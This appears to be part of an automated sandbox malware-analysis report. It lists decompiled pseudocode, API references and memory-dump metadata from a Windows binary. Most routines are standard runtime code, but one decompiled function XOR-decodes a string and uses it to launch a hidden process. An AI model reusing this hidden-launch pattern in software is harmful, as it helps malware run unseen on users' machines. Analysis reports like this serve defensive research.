                                                                                        • WideCharToMultiByte.KERNEL32(?,00000000,?,00000001,00000000,00000005,00000000,00000000), ref: 006C5C72
                                                                                        • WriteFile.KERNEL32(?,00000000,00000000,006C62E9,00000000,?,?,?,?,?,?,?,?,?,006C62E9,00000003), ref: 006C5C91
                                                                                        • WriteFile.KERNEL32(?,00000003,00000001,006C62E9,00000000,?,?,?,?,?,?,?,?,?,006C62E9,00000003), ref: 006C5CCA
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.721377844.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.721360804.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.722085107.0000000000811000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723189213.000000000090D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723221613.0000000000913000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723221613.0000000001313000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731812655.00000000017F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731827637.00000000017F6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731837813.00000000017FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731837813.0000000001808000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731860109.000000000180E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: FileWrite__fassign$ByteCharConsoleMultiWide
                                                                                        • String ID:
                                                                                        • API String ID: 1324828854-0
                                                                                        • Opcode ID: 3b3aae1a3027b088d9e1850a710b291e5875d4a438a0786d1482fd059dec9729
                                                                                        • Instruction ID: 1072efdf62d9c4f3cf507da8ce8792c21a7ac92986aa1d4cf49bad4ceac1707a
                                                                                        • Opcode Fuzzy Hash: 3b3aae1a3027b088d9e1850a710b291e5875d4a438a0786d1482fd059dec9729
                                                                                        • Instruction Fuzzy Hash: 7C518E70A006499FCB10CFA8DC89FEEBBB9EF48310F14415EE956E7251D730A981CB64
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 59%
                                                                                        			E10003C30(void* __ebx, void* __edi, void* __esi, void* __eflags, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12) {
                                                                                        				char _v5;
                                                                                        				signed int _v12;
                                                                                        				char _v16;
                                                                                        				intOrPtr _v20;
                                                                                        				intOrPtr _v24;
                                                                                        				intOrPtr _v28;
                                                                                        				char _v32;
                                                                                        				intOrPtr _v36;
                                                                                        				intOrPtr _v40;
                                                                                        				char _t54;
                                                                                        				signed int _t61;
                                                                                        				intOrPtr _t62;
                                                                                        				void* _t63;
                                                                                        				intOrPtr* _t64;
                                                                                        				intOrPtr _t66;
                                                                                        				intOrPtr _t68;
                                                                                        				signed int _t69;
                                                                                        				signed int _t70;
                                                                                        				signed int _t73;
                                                                                        				intOrPtr _t77;
                                                                                        				intOrPtr _t79;
                                                                                        				signed int _t81;
                                                                                        				char _t83;
                                                                                        				intOrPtr _t87;
                                                                                        				intOrPtr* _t88;
                                                                                        				signed int _t95;
                                                                                        				signed int _t96;
                                                                                        				intOrPtr _t99;
                                                                                        				intOrPtr _t102;
                                                                                        				signed int _t104;
                                                                                        				void* _t107;
                                                                                        				void* _t108;
                                                                                        				void* _t115;
                                                                                        
                                                                                        				_t77 = _a8;
                                                                                        				_push(__edi);
                                                                                        				_v5 = 0;
                                                                                        				_t102 = _t77 + 0x10;
                                                                                        				_push(_t102);
                                                                                        				_v16 = 1;
                                                                                        				_v20 = _t102;
                                                                                        				_v12 =  *(_t77 + 8) ^  *0x1001a004;
                                                                                        				E10003BF0(__edi, _t102,  *(_t77 + 8) ^  *0x1001a004);
                                                                                        				E10004E2C(_a12);
                                                                                        				_t54 = _a4;
                                                                                        				_t108 = _t107 + 0xc;
                                                                                        				_t99 =  *((intOrPtr*)(_t77 + 0xc));
                                                                                        				if(( *(_t54 + 4) & 0x00000066) != 0) {
                                                                                        					__eflags = _t99 - 0xfffffffe;
                                                                                        					if(_t99 != 0xfffffffe) {
                                                                                        						E10004FE0(_t77, 0xfffffffe, _t102, 0x1001a004);
                                                                                        						goto L14;
                                                                                        					}
                                                                                        					goto L15;
                                                                                        				} else {
                                                                                        					_v32 = _t54;
                                                                                        					_v28 = _a12;
                                                                                        					 *((intOrPtr*)(_t77 - 4)) =  &_v32;
                                                                                        					if(_t99 == 0xfffffffe) {
                                                                                        						L15:
                                                                                        						return _v16;
                                                                                        					} else {
                                                                                        						do {
                                                                                        							_t81 = _v12;
                                                                                        							_t20 = _t99 + 2; // 0x3
                                                                                        							_t61 = _t99 + _t20 * 2;
                                                                                        							_t79 =  *((intOrPtr*)(_t81 + _t61 * 4));
                                                                                        							_t62 = _t81 + _t61 * 4;
                                                                                        							_t82 =  *((intOrPtr*)(_t62 + 4));
                                                                                        							_v24 = _t62;
                                                                                        							if( *((intOrPtr*)(_t62 + 4)) == 0) {
                                                                                        								_t83 = _v5;
                                                                                        								goto L8;
                                                                                        							} else {
                                                                                        								_t63 = E10004F90(_t82, _t102);
                                                                                        								_t83 = 1;
                                                                                        								_v5 = 1;
                                                                                        								_t115 = _t63;
                                                                                        								if(_t115 < 0) {
                                                                                        									_v16 = 0;
                                                                                        									L14:
                                                                                        									_push(_t102);
                                                                                        									E10003BF0(_t99, _t102, _v12);
                                                                                        									goto L15;
                                                                                        								} else {
                                                                                        									if(_t115 > 0) {
                                                                                        										_t64 = _a4;
                                                                                        										__eflags =  *_t64 - 0xe06d7363;
                                                                                        										if( *_t64 == 0xe06d7363) {
                                                                                        											__eflags =  *0x100131fc;
                                                                                        											if(__eflags != 0) {
                                                                                        												_t73 = E100122E0(__eflags, 0x100131fc);
                                                                                        												_t108 = _t108 + 4;
                                                                                        												__eflags = _t73;
                                                                                        												if(_t73 != 0) {
                                                                                        													_t104 =  *0x100131fc; // 0x100039be
                                                                                        													 *0x1001312c(_a4, 1);
                                                                                        													 *_t104();
                                                                                        													_t102 = _v20;
                                                                                        													_t108 = _t108 + 8;
                                                                                        												}
                                                                                        												_t64 = _a4;
                                                                                        											}
                                                                                        										}
                                                                                        										E10004FC4(_t64, _a8, _t64);
                                                                                        										_t66 = _a8;
                                                                                        										__eflags =  *((intOrPtr*)(_t66 + 0xc)) - _t99;
                                                                                        										if( *((intOrPtr*)(_t66 + 0xc)) != _t99) {
                                                                                        											E10004FE0(_t66, _t99, _t102, 0x1001a004);
                                                                                        											_t66 = _a8;
                                                                                        										}
                                                                                        										_push(_t102);
                                                                                        										 *((intOrPtr*)(_t66 + 0xc)) = _t79;
                                                                                        										E10003BF0(_t99, _t102, _v12);
                                                                                        										E10004FA8();
                                                                                        										asm("int3");
                                                                                        										_t68 = _v40;
                                                                                        										_t87 = _v36;
                                                                                        										__eflags = _t68 - _t87;
                                                                                        										if(_t68 != _t87) {
                                                                                        											_t88 = _t87 + 5;
                                                                                        											_t69 = _t68 + 5;
                                                                                        											__eflags = _t69;
                                                                                        											while(1) {
                                                                                        												_t95 =  *_t69;
                                                                                        												__eflags = _t95 -  *_t88;
                                                                                        												if(_t95 !=  *_t88) {
                                                                                        													break;
                                                                                        												}
                                                                                        												__eflags = _t95;
                                                                                        												if(_t95 == 0) {
                                                                                        													goto L25;
                                                                                        												} else {
                                                                                        													_t96 =  *((intOrPtr*)(_t69 + 1));
                                                                                        													__eflags = _t96 -  *((intOrPtr*)(_t88 + 1));
                                                                                        													if(_t96 !=  *((intOrPtr*)(_t88 + 1))) {
                                                                                        														break;
                                                                                        													} else {
                                                                                        														_t69 = _t69 + 2;
                                                                                        														_t88 = _t88 + 2;
                                                                                        														__eflags = _t96;
                                                                                        														if(_t96 != 0) {
                                                                                        															continue;
                                                                                        														} else {
                                                                                        															goto L25;
                                                                                        														}
                                                                                        													}
                                                                                        												}
                                                                                        												goto L33;
                                                                                        											}
                                                                                        											asm("sbb eax, eax");
                                                                                        											_t70 = _t69 | 0x00000001;
                                                                                        											__eflags = _t70;
                                                                                        											return _t70;
                                                                                        										} else {
                                                                                        											L25:
                                                                                        											__eflags = 0;
                                                                                        											return 0;
                                                                                        										}
                                                                                        									} else {
                                                                                        										goto L8;
                                                                                        									}
                                                                                        								}
                                                                                        							}
                                                                                        							goto L33;
                                                                                        							L8:
                                                                                        							_t99 = _t79;
                                                                                        						} while (_t79 != 0xfffffffe);
                                                                                        						if(_t83 != 0) {
                                                                                        							goto L14;
                                                                                        						}
                                                                                        						goto L15;
                                                                                        					}
                                                                                        				}
                                                                                        				L33:
                                                                                        			}




































                                                                                        0x10003c37
                                                                                        0x10003c3b
                                                                                        0x10003c3c
                                                                                        0x10003c43
                                                                                        0x10003c4c
                                                                                        0x10003c4e
                                                                                        0x10003c55
                                                                                        0x10003c58
                                                                                        0x10003c5b
                                                                                        0x10003c63
                                                                                        0x10003c68
                                                                                        0x10003c6b
                                                                                        0x10003c6e
                                                                                        0x10003c75
                                                                                        0x10003cd6
                                                                                        0x10003cd9
                                                                                        0x10003ce8
                                                                                        0x00000000
                                                                                        0x10003ce8
                                                                                        0x00000000
                                                                                        0x10003c77
                                                                                        0x10003c77
                                                                                        0x10003c7d
                                                                                        0x10003c83
                                                                                        0x10003c89
                                                                                        0x10003cf9
                                                                                        0x10003d02
                                                                                        0x10003c8b
                                                                                        0x10003c90
                                                                                        0x10003c90
                                                                                        0x10003c93
                                                                                        0x10003c96
                                                                                        0x10003c99
                                                                                        0x10003c9c
                                                                                        0x10003c9f
                                                                                        0x10003ca2
                                                                                        0x10003ca7
                                                                                        0x10003cbd
                                                                                        0x00000000
                                                                                        0x10003ca9
                                                                                        0x10003cab
                                                                                        0x10003cb0
                                                                                        0x10003cb2
                                                                                        0x10003cb5
                                                                                        0x10003cb7
                                                                                        0x10003ccd
                                                                                        0x10003ced
                                                                                        0x10003ced
                                                                                        0x10003cf1
                                                                                        0x00000000
                                                                                        0x10003cb9
                                                                                        0x10003cb9
                                                                                        0x10003d03
                                                                                        0x10003d06
                                                                                        0x10003d0c
                                                                                        0x10003d0e
                                                                                        0x10003d15
                                                                                        0x10003d1c
                                                                                        0x10003d21
                                                                                        0x10003d24
                                                                                        0x10003d26
                                                                                        0x10003d28
                                                                                        0x10003d35
                                                                                        0x10003d3b
                                                                                        0x10003d3d
                                                                                        0x10003d40
                                                                                        0x10003d40
                                                                                        0x10003d43
                                                                                        0x10003d43
                                                                                        0x10003d15
                                                                                        0x10003d4b
                                                                                        0x10003d50
                                                                                        0x10003d53
                                                                                        0x10003d56
                                                                                        0x10003d62
                                                                                        0x10003d67
                                                                                        0x10003d67
                                                                                        0x10003d6a
                                                                                        0x10003d6e
                                                                                        0x10003d71
                                                                                        0x10003d81
                                                                                        0x10003d86
                                                                                        0x10003d8a
                                                                                        0x10003d8d
                                                                                        0x10003d90
                                                                                        0x10003d92
                                                                                        0x10003d98
                                                                                        0x10003d9b
                                                                                        0x10003d9b
                                                                                        0x10003d9e
                                                                                        0x10003d9e
                                                                                        0x10003da0
                                                                                        0x10003da2
                                                                                        0x00000000
                                                                                        0x00000000
                                                                                        0x10003da4
                                                                                        0x10003da6
                                                                                        0x00000000
                                                                                        0x10003da8
                                                                                        0x10003da8
                                                                                        0x10003dab
                                                                                        0x10003dae
                                                                                        0x00000000
                                                                                        0x10003db0
                                                                                        0x10003db0
                                                                                        0x10003db3
                                                                                        0x10003db6
                                                                                        0x10003db8
                                                                                        0x00000000
                                                                                        0x10003dba
                                                                                        0x00000000
                                                                                        0x10003dba
                                                                                        0x10003db8
                                                                                        0x10003dae
                                                                                        0x00000000
                                                                                        0x10003da6
                                                                                        0x10003dbc
                                                                                        0x10003dbe
                                                                                        0x10003dbe
                                                                                        0x10003dc2
                                                                                        0x10003d94
                                                                                        0x10003d94
                                                                                        0x10003d94
                                                                                        0x10003d97
                                                                                        0x10003d97
                                                                                        0x10003cbb
                                                                                        0x00000000
                                                                                        0x10003cbb
                                                                                        0x10003cb9
                                                                                        0x10003cb7
                                                                                        0x00000000
                                                                                        0x10003cc0
                                                                                        0x10003cc0
                                                                                        0x10003cc2
                                                                                        0x10003cc9
                                                                                        0x00000000
                                                                                        0x10003ccb
                                                                                        0x00000000
                                                                                        0x10003cc9
                                                                                        0x10003c89
                                                                                        0x00000000

                                                                                        APIs
                                                                                        • _ValidateLocalCookies.LIBCMT ref: 10003C5B
                                                                                        • ___except_validate_context_record.LIBVCRUNTIME ref: 10003C63
                                                                                        • _ValidateLocalCookies.LIBCMT ref: 10003CF1
                                                                                        • __IsNonwritableInCurrentImage.LIBCMT ref: 10003D1C
                                                                                        • _ValidateLocalCookies.LIBCMT ref: 10003D71
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.661084660.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000000.00000003.373928207.000000001001D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661074193.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661103501.0000000010013000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661115201.000000001001A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661124775.000000001001C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_10000000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: CookiesLocalValidate$CurrentImageNonwritable___except_validate_context_record
                                                                                        • String ID: csm
                                                                                        • API String ID: 1170836740-1018135373
                                                                                        • Opcode ID: f3ed32764f61d3043a84a1f76012779c5a230be239f4a1e2980c48cd814d2969
                                                                                        • Instruction ID: 3d476a9535f8ecdc82b2d8ab0b59788e9c6aaf1c5a63dceb117ce177baf3a1f2
                                                                                        • Opcode Fuzzy Hash: f3ed32764f61d3043a84a1f76012779c5a230be239f4a1e2980c48cd814d2969
                                                                                        • Instruction Fuzzy Hash: FE41E534A00119AFEF01CF68C885A9F7BE9EF45394F11C165E915AB356C731E905CB90
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 58%
                                                                                        			E10001000(void* __edi, void* __esi, intOrPtr _a4) {
                                                                                        				signed int _v8;
                                                                                        				short _v1032;
                                                                                        				short _v1036;
                                                                                        				short _v1040;
                                                                                        				struct _PROCESS_INFORMATION _v1056;
                                                                                        				short _v1058;
                                                                                        				struct _STARTUPINFOW _v1124;
                                                                                        				signed int _t29;
                                                                                        				short _t33;
                                                                                        				short _t34;
                                                                                        				signed int _t54;
                                                                                        				intOrPtr _t64;
                                                                                        				signed int _t66;
                                                                                        
                                                                                        				_t29 =  *0x1001a004; // 0xcfb68a75
                                                                                        				_v8 = _t29 ^ _t66;
                                                                                        				_t64 = _a4;
                                                                                        				E10003E50(__edi,  &_v1032, 0, 0x400);
                                                                                        				_t33 =  *0x10018920; // 0x4a001d
                                                                                        				_v1040 = _t33;
                                                                                        				_t54 = 0;
                                                                                        				_t34 =  *0x10018924; // 0x3a
                                                                                        				_v1036 = _t34;
                                                                                        				do {
                                                                                        					 *(_t66 + _t54 * 2 - 0x40c) =  *(_t66 + _t54 * 2 - 0x40c) ^ _t54 - ((0x094f2095 * _t54 >> 0x00000020 >> 0x00000001 >> 0x0000001f) + (0x094f2095 * _t54 >> 0x00000020 >> 0x00000001)) * 0x00000037 + 0x00000038;
                                                                                        					_t54 = _t54 + 1;
                                                                                        				} while (_t54 < 3);
                                                                                        				wsprintfW( &_v1032,  &_v1040, _t64);
                                                                                        				_v1124.cb = 0x44;
                                                                                        				_v1124.dwFlags = 1;
                                                                                        				_v1058 = 0;
                                                                                        				asm("xorps xmm0, xmm0");
                                                                                        				_v1124.wShowWindow = 0;
                                                                                        				asm("movlpd [ebp-0x45c], xmm0");
                                                                                        				asm("movlpd [ebp-0x454], xmm0");
                                                                                        				asm("movlpd [ebp-0x44c], xmm0");
                                                                                        				asm("movlpd [ebp-0x444], xmm0");
                                                                                        				asm("movlpd [ebp-0x43c], xmm0");
                                                                                        				asm("movlpd [ebp-0x42e], xmm0");
                                                                                        				asm("movlpd [ebp-0x426], xmm0");
                                                                                        				asm("movups [ebp-0x41c], xmm0");
                                                                                        				if(CreateProcessW(0,  &_v1032, 0, 0, 0, 0x10, 0, 0,  &_v1124,  &_v1056) != 0) {
                                                                                        					WaitForSingleObject(_v1056.hProcess, 0);
                                                                                        					CloseHandle(_v1056.hThread);
                                                                                        					CloseHandle(_v1056);
                                                                                        				}
                                                                                        				return E1000296F(_v8 ^ _t66);
                                                                                        			}
















                                                                                        0x10001009
                                                                                        0x10001010
                                                                                        0x10001014
                                                                                        0x10001025
                                                                                        0x1000102a
                                                                                        0x10001032
                                                                                        0x10001038
                                                                                        0x1000103a
                                                                                        0x10001040
                                                                                        0x10001047
                                                                                        0x10001061
                                                                                        0x10001069
                                                                                        0x1000106a
                                                                                        0x1000107e
                                                                                        0x10001087
                                                                                        0x10001093
                                                                                        0x1000109d
                                                                                        0x100010a4
                                                                                        0x100010a7
                                                                                        0x100010bb
                                                                                        0x100010d6
                                                                                        0x100010e1
                                                                                        0x100010e9
                                                                                        0x100010f1
                                                                                        0x100010f9
                                                                                        0x10001101
                                                                                        0x10001109
                                                                                        0x10001118
                                                                                        0x10001122
                                                                                        0x10001134
                                                                                        0x1000113c
                                                                                        0x1000113c
                                                                                        0x10001151

                                                                                        APIs
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.661084660.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000000.00000003.373928207.000000001001D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661074193.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661103501.0000000010013000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661115201.000000001001A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661124775.000000001001C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_10000000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseHandle$CreateObjectProcessSingleWaitwsprintf
                                                                                        • String ID: D
                                                                                        • API String ID: 2901399712-2746444292
                                                                                        • Opcode ID: 058937fe811913709249d1eb2d861b8dba9520e66a11a8f7a00ddd357638df8d
                                                                                        • Instruction ID: fd4ab830acc48487d8c81b4dc092c100d738fc2be38a6ce03cbde353f9390571
                                                                                        • Opcode Fuzzy Hash: 058937fe811913709249d1eb2d861b8dba9520e66a11a8f7a00ddd357638df8d
                                                                                        • Instruction Fuzzy Hash: 403141B5E0022C97DB20CB54CD81BD9B7B9AF59704F0092E6F708A6195EA706BC58F8D
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 100%
                                                                                        			E1000E7DF(intOrPtr _a4) {
                                                                                        				void* _t18;
                                                                                        
                                                                                        				_t45 = _a4;
                                                                                        				if(_a4 != 0) {
                                                                                        					E1000E7A3(_t45, 7);
                                                                                        					E1000E7A3(_t45 + 0x1c, 7);
                                                                                        					E1000E7A3(_t45 + 0x38, 0xc);
                                                                                        					E1000E7A3(_t45 + 0x68, 0xc);
                                                                                        					E1000E7A3(_t45 + 0x98, 2);
                                                                                        					E10009811( *((intOrPtr*)(_t45 + 0xa0)));
                                                                                        					E10009811( *((intOrPtr*)(_t45 + 0xa4)));
                                                                                        					E10009811( *((intOrPtr*)(_t45 + 0xa8)));
                                                                                        					E1000E7A3(_t45 + 0xb4, 7);
                                                                                        					E1000E7A3(_t45 + 0xd0, 7);
                                                                                        					E1000E7A3(_t45 + 0xec, 0xc);
                                                                                        					E1000E7A3(_t45 + 0x11c, 0xc);
                                                                                        					E1000E7A3(_t45 + 0x14c, 2);
                                                                                        					E10009811( *((intOrPtr*)(_t45 + 0x154)));
                                                                                        					E10009811( *((intOrPtr*)(_t45 + 0x158)));
                                                                                        					E10009811( *((intOrPtr*)(_t45 + 0x15c)));
                                                                                        					return E10009811( *((intOrPtr*)(_t45 + 0x160)));
                                                                                        				}
                                                                                        				return _t18;
                                                                                        			}




                                                                                        0x1000e7e5
                                                                                        0x1000e7ea
                                                                                        0x1000e7f3
                                                                                        0x1000e7fe
                                                                                        0x1000e809
                                                                                        0x1000e814
                                                                                        0x1000e822
                                                                                        0x1000e82d
                                                                                        0x1000e838
                                                                                        0x1000e843
                                                                                        0x1000e851
                                                                                        0x1000e85f
                                                                                        0x1000e870
                                                                                        0x1000e87e
                                                                                        0x1000e88c
                                                                                        0x1000e897
                                                                                        0x1000e8a2
                                                                                        0x1000e8ad
                                                                                        0x00000000
                                                                                        0x1000e8bd
                                                                                        0x1000e8c2

                                                                                        APIs
                                                                                          • Part of subcall function 1000E7A3: _free.LIBCMT ref: 1000E7CC
                                                                                        • _free.LIBCMT ref: 1000E82D
                                                                                          • Part of subcall function 10009811: HeapFree.KERNEL32(00000000,00000000,?,1000E7D1,?,00000000,?,00000000,?,1000E7F8,?,00000007,?,?,1000C606,?), ref: 10009827
                                                                                          • Part of subcall function 10009811: GetLastError.KERNEL32(?,?,1000E7D1,?,00000000,?,00000000,?,1000E7F8,?,00000007,?,?,1000C606,?,?), ref: 10009839
                                                                                        • _free.LIBCMT ref: 1000E838
                                                                                        • _free.LIBCMT ref: 1000E843
                                                                                        • _free.LIBCMT ref: 1000E897
                                                                                        • _free.LIBCMT ref: 1000E8A2
                                                                                        • _free.LIBCMT ref: 1000E8AD
                                                                                        • _free.LIBCMT ref: 1000E8B8
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000003.661084660.0000000010001000.00000020.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                        • Associated: 00000000.00000003.373928207.000000001001D000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661074193.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661103501.0000000010013000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661115201.000000001001A000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                        • Associated: 00000000.00000003.661124775.000000001001C000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_3_10000000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        • Opcode ID: effd3c642e76481541b7bb719a060aa86952e625c350c219352219d2f68106ab
                                                                                        • Instruction ID: 88a083c151fc6feb16da4d030d530f1eca492e8ee35411a001c7d5c461b3c07a
                                                                                        • Opcode Fuzzy Hash: effd3c642e76481541b7bb719a060aa86952e625c350c219352219d2f68106ab
                                                                                        • Instruction Fuzzy Hash: AE115935548B44BAEA20EBB0CC4AFCF77DCEF41780F448835B29DA6156DA24B9068751
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                          • Part of subcall function 006CDC20: _free.LIBCMT ref: 006CDC49
                                                                                        • _free.LIBCMT ref: 006CDF27
                                                                                          • Part of subcall function 006C6C17: RtlFreeHeap.NTDLL(00000000,00000000,?,006C6996,00000000,00000000,018059B4,00000000,?,006B3319,009066E0,00000010), ref: 006C6C2D
                                                                                          • Part of subcall function 006C6C17: GetLastError.KERNEL32(00000000,?,006C6996,00000000,00000000,018059B4,00000000,?,006B3319,009066E0,00000010), ref: 006C6C3F
                                                                                        • _free.LIBCMT ref: 006CDF32
                                                                                        • _free.LIBCMT ref: 006CDF3D
                                                                                        • _free.LIBCMT ref: 006CDF91
                                                                                        • _free.LIBCMT ref: 006CDF9C
                                                                                        • _free.LIBCMT ref: 006CDFA7
                                                                                        • _free.LIBCMT ref: 006CDFB2
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.721377844.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.721360804.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.722085107.0000000000811000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723189213.000000000090D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723221613.0000000000913000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723221613.0000000001313000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731812655.00000000017F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731827637.00000000017F6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731837813.00000000017FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731837813.0000000001808000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731860109.000000000180E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: _free$ErrorFreeHeapLast
                                                                                        • String ID:
                                                                                        • API String ID: 776569668-0
                                                                                        • Opcode ID: b4bd74d8bdeceb2920cedab94386837d0b22ba68f98f13aa5b7db7e8d5dbf300
                                                                                        • Instruction ID: a1d13657e58dcc85d1a0ca35fdc34a0bc396c24de86d3031c25a2cd87d871e98
                                                                                        • Opcode Fuzzy Hash: b4bd74d8bdeceb2920cedab94386837d0b22ba68f98f13aa5b7db7e8d5dbf300
                                                                                        • Instruction Fuzzy Hash: E3115171540B04BAD6A0B7B0CC0BFEBB79EEF04704F400C2EB2D966052DAB5F9549668
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        APIs
                                                                                        • GetModuleHandleExW.KERNEL32(00000000,mscoree.dll,00000000,?,?,?,006BD5E8,00000003,?,006BD588,00000003,00906868,0000000C,006BD6DF,00000003,00000002), ref: 006BD657
                                                                                        • GetProcAddress.KERNEL32(00000000,CorExitProcess), ref: 006BD66A
                                                                                        • FreeLibrary.KERNEL32(00000000,?,?,?,006BD5E8,00000003,?,006BD588,00000003,00906868,0000000C,006BD6DF,00000003,00000002,00000000), ref: 006BD68D
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 00000000.00000002.721377844.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                        • Associated: 00000000.00000002.721360804.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.722085107.0000000000811000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723189213.000000000090D000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723221613.0000000000913000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.723221613.0000000001313000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731812655.00000000017F5000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731827637.00000000017F6000.00000008.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731837813.00000000017FE000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731837813.0000000001808000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                        • Associated: 00000000.00000002.731860109.000000000180E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_0_2_400000______NCM______2_10042231.jbxd
                                                                                        Similarity
                                                                                        • API ID: AddressFreeHandleLibraryModuleProc
                                                                                        • String ID: CorExitProcess$P1@$mscoree.dll
                                                                                        • API String ID: 4061214504-1586512162
                                                                                        • Opcode ID: 865fdc20428412837bd66001d23bd4f6701aa524aa815b8102e2283f2b03a7a9
                                                                                        • Instruction ID: 7307a46e1ca96e74eef6390c7598f36025a5a4161088213d30f65ac3e41c0b10
                                                                                        • Opcode Fuzzy Hash: 865fdc20428412837bd66001d23bd4f6701aa524aa815b8102e2283f2b03a7a9
                                                                                        • Instruction Fuzzy Hash: A2F04430A11209BBCF159F91DC49BDDBFB9FF48711F014169F909E6250EB355A44CB94
                                                                                        Uniqueness

                                                                                        Uniqueness Score: -1.00%

                                                                                        C-Code - Quality: 69%
